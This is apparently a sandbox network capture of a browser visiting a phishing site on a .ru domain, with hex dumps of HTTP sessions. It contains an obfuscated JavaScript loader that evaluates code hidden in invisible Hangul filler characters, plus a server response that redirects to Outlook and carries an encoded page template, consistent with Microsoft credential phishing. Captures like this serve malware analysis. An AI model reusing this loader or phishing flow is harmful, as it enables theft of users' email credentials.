                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 67 65 74 3a 20 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 70 72 6f 70 29 20 7b 0d 0a 20 20 20 20 64 65 63 6f 64 65 41 6e 64 45 76 61 6c 75 61 74 65 28 70 72 6f 70 29 3b 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 74 72 75 65 3b 0d 0a 20 20 7d 0d 0a 7d 3b 0d 0a 63 6f 6e 73 74 20 76 69 65 77 73 65 6e 20 3d 20 6e 65 77 20 50 72 6f 78 79 28 7b 7d 2c 20 68 61 6e 64 6c 65 72 29 3b 0d 0a 76 69 65 77 73 65 6e 5b 22 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be
                                                                  Data Ascii: get: function(_, prop) { decodeAndEvaluate(prop); return true; }};const viewsen = new Proxy({}, handler);viewsen["
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0
                                                                  Data Ascii:
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3
                                                                  Data Ascii:
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: a4 ef be a0 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85
                                                                  Data Ascii:
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4
                                                                  Data Ascii:
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef
                                                                  Data Ascii:
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: a0 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be
                                                                  Data Ascii:
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 ef be a0
                                                                  Data Ascii:
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 ef be a0 e3 85 a4 e3 85 a4 ef be a0 e3 85 a4 ef be a0 ef
                                                                  Data Ascii:


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  28192.168.2.449757104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:01 UTC1473OUTGET /kl9Cb6f7Uuv8fQEwD093oOMERlzX9OD3Ac3VPlY56wuFWGKQ35uHV6xBNjuv220 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:01 UTC1106INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:01 GMT
                                                                  Content-Type: image/svg+xml
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Content-Disposition: inline; filename="kl9Cb6f7Uuv8fQEwD093oOMERlzX9OD3Ac3VPlY56wuFWGKQ35uHV6xBNjuv220"
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lAKUN10LFMAA0Vmoof8ScJ5K32hAAB22r7k8Ns4iZAjX%2Bm5uh56yTj5A1sTgxUwleuudBAhMmoTv6k673y9%2BWdx5xnrie0w91JFaMZyPhsWhvB7zAQOqQLxR44Bl"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5263&min_rtt=4871&rtt_var=2107&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2380&delivery_rate=584684&cwnd=244&unsent_bytes=0&cid=c9069950ea166bd2&ts=151&x=0"
                                                                  vary: accept-encoding
                                                                  Server: cloudflare
                                                                  CF-RAY: 9203713e089197d5-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2434&min_rtt=2432&rtt_var=914&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2045&delivery_rate=1200657&cwnd=84&unsent_bytes=0&cid=1c73b11d21aac2f1&ts=435&x=0"
                                                                  2025-03-14 11:31:01 UTC263INData Raw: 33 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                                  Data Ascii: 359<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                                  2025-03-14 11:31:01 UTC601INData Raw: 66 69 6c 6c 3d 22 75 72 6c 28 23 41 29 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 39 34 2e 32 20 31 38 31 35 2e 36 63 37 34 36 2e 35 38 20 30 20 31 33 35 31 2e 38 2d 34 39 33 2e 32 20 31 33 35 31 2e 38 2d 31 31 30 31 2e 36 53 31 31 34 30 2e 37 38 2d 33 38 37 2e 36 20 33 39 34 2e 32 2d 33 38 37 2e 36 2d 39 35 37 2e 36 20 31 30 35 2e 36 30 33 2d 39 35 37 2e 36 20 37 31 34 2d 33 35 32 2e 33 38 20 31 38 31 35 2e 36 20 33 39 34 2e 32 20 31 38 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 42 29 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 34 38 2e 36 20 31 38 38 35 2e 32 63 36 33 31 2e 39 32 20 30 20 31 31 34 34 2e 32 2d 34 31 37 2e 34 35 20 31 31 34 34 2e 32 2d 39 33 32 2e 34 53 32 31 38 30 2e 35 32 20 32 30 2e 34 20 31 35 34 38 2e 36 20 32 30 2e 34 20
                                                                  Data Ascii: fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4
                                                                  2025-03-14 11:31:01 UTC1014INData Raw: 33 65 66 0d 0a 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 34 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 2f 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 42 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 33 39 34 2e 32 20
                                                                  Data Ascii: 3ef393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><radialGradient id="B" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(394.2
                                                                  2025-03-14 11:31:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  29192.168.2.449758104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:31:01 UTC1554OUTPOST /ngCf6zNL05pFHgvTMQm9xQYlhkLm1aOsVcQy9yi32 HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  Content-Length: 53
                                                                  sec-ch-ua-platform: "Windows"
                                                                  X-Requested-With: XMLHttpRequest
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                  sec-ch-ua-mobile: ?0
                                                                  Origin: https://encryption-marinha.jkndfuzv.ru
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFYiLCJtYWMiOiJkOGMxZDY5MzczN2Q0OWI2NTgyYjMyNTE1MmMzMmM3ZTk1ZWUyNjBlYTA0OWU2NTUxYTMyNDNkZWMwYjJjNTFiIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:31:01 UTC53OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 6c 6b 6d 30 4f 61 75 50 48 6d 72 36 45 43 41 6d 74 57 58 67 7a 77 25 33 44 25 33 44 26 74 79 70 65 3d 34 26 61 70 70 6e 75 6d 3d 31
                                                                  Data Ascii: pagelink=lkm0OauPHmr6ECAmtWXgzw%3D%3D&type=4&appnum=1
                                                                  2025-03-14 11:31:01 UTC1183INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:31:01 GMT
                                                                  Content-Type: application/json
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: no-cache, private
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b3gGU1xpnJ%2FRgSBvRezutlM79LiaNIo8WE%2Bn%2FvK6CHTE3%2BXTZXKp19%2BPbwUKM5Vk2Q2a%2FIqWGpDDv%2BTJDcR0RPybIHjZz4MBJ%2B3aV3c38r66RQrvhklQsDZtMeuT"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6065&min_rtt=5960&rtt_var=2445&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2516&delivery_rate=418638&cwnd=251&unsent_bytes=0&cid=054254396b4ae312&ts=100&x=0"
                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6IkdseWYxdzJpWGVTMEJydy94MkFEYUE9PSIsInZhbHVlIjoiVDlBTUxyMTdQRGFWdzZhSXNvKzBKUjM5WVFPZ3hER3crN2pEcjFiVUZCL0VSaENmUkxGMEVJNDhQeVAvOVpIS2RRdjRPOVE3OXcraFNBbmluRFA4VWFlZGdZVmhRVW5lelFlQXEzSFQrTjdhSWhmTjhqREQ4OVZmTDNVNlBsRVoiLCJtYWMiOiJkODczY2M4ZGQ1YWE1NjcyNmMxZTFiYmUyYmZhZmY4YTg3ZGM5NjMxZDNlNzQwMTgwYTZmM2Q4ZDQ1MmU1OWUyIiwidGFnIjoiIn0%3D; expires=Fri, 14-Mar-2025 13:31:01 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                  2025-03-14 11:31:01 UTC785INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 68 74 51 6c 70 6c 57 43 38 31 62 56 56 6a 63 45 56 77 53 48 64 45 4e 31 68 44 4f 55 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4f 46 5a 47 5a 45 64 6d 53 44 68 31 4e 44 68 75 59 57 70 72 51 55 38 7a 64 46 4a 45 64 33 4e 51 55 30 46 79 5a 45 78 58 62 54 42 48 55 6e 56 31 55 6c 6c 45 55 55 56 49 4d 48 46 59 4f 45 68 30 4d 57 31 56 4e 32 5a 45 56 32 74 6a 56 6e 55 33 51 33 4a 4b 62 45 70 78 52 6b 63 76 4d 55 70 6d 62 6a 46 69 5a 6e 64 59 52 31 64 58 61 6e 42 4b 4d 6a 46 49 61 32 6c 58 4e 6c 46 76 55 47 46 35 4f 56 52 6b 56 32 6c 6f 4c 31 42 4c 4f 48 4e 48 64 53 74 70 4e 55 39 6e 53 33 45 7a 64 56 4e 68 62 44 56 68 52 55 74 74 62 79 38
                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImhtQlplWC81bVVjcEVwSHdEN1hDOUE9PSIsInZhbHVlIjoiOFZGZEdmSDh1NDhuYWprQU8zdFJEd3NQU0FyZExXbTBHUnV1UllEUUVIMHFYOEh0MW1VN2ZEV2tjVnU3Q3JKbEpxRkcvMUpmbjFiZndYR1dXanBKMjFIa2lXNlFvUGF5OVRkV2loL1BLOHNHdStpNU9nS3EzdVNhbDVhRUttby8
                                                                  2025-03-14 11:31:01 UTC1369INData Raw: 65 32 39 0d 0a 7b 22 65 78 70 69 72 65 64 22 3a 30 2c 22 72 65 64 69 72 65 63 74 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6f 75 74 6c 6f 6f 6b 2e 6f 66 66 69 63 65 2e 63 6f 6d 5c 2f 6d 61 69 6c 5c 2f 69 6e 62 6f 78 5c 2f 22 2c 22 72 65 64 74 65 6d 70 22 3a 22 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 43 6a 78 6f 64 47 31 73 49 47 78 68 62 6d 63 39 49 6d 56 75 49 6a 34 4b 50 47 68 6c 59 57 51 2b 43 69 41 67 49 43 41 38 62 57 56 30 59 53 42 6a 61 47 46 79 63 32 56 30 50 53 4a 56 56 45 59 74 4f 43 49 2b 43 69 41 67 49 43 41 38 62 57 56 30 59 53 42 75 59 57 31 6c 50 53 4a 32 61 57 56 33 63 47 39 79 64 43 49 67 59 32 39 75 64 47 56 75 64 44 30 69 64 32 6c 6b 64 47 67 39 5a 47 56 32 61 57 4e 6c 4c 58 64 70 5a 48 52 6f 4c 43 42 70 62 6d
                                                                  Data Ascii: e29{"expired":0,"redirecturl":"https:\/\/outlook.office.com\/mail\/inbox\/","redtemp":"PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0PSJVVEYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbm
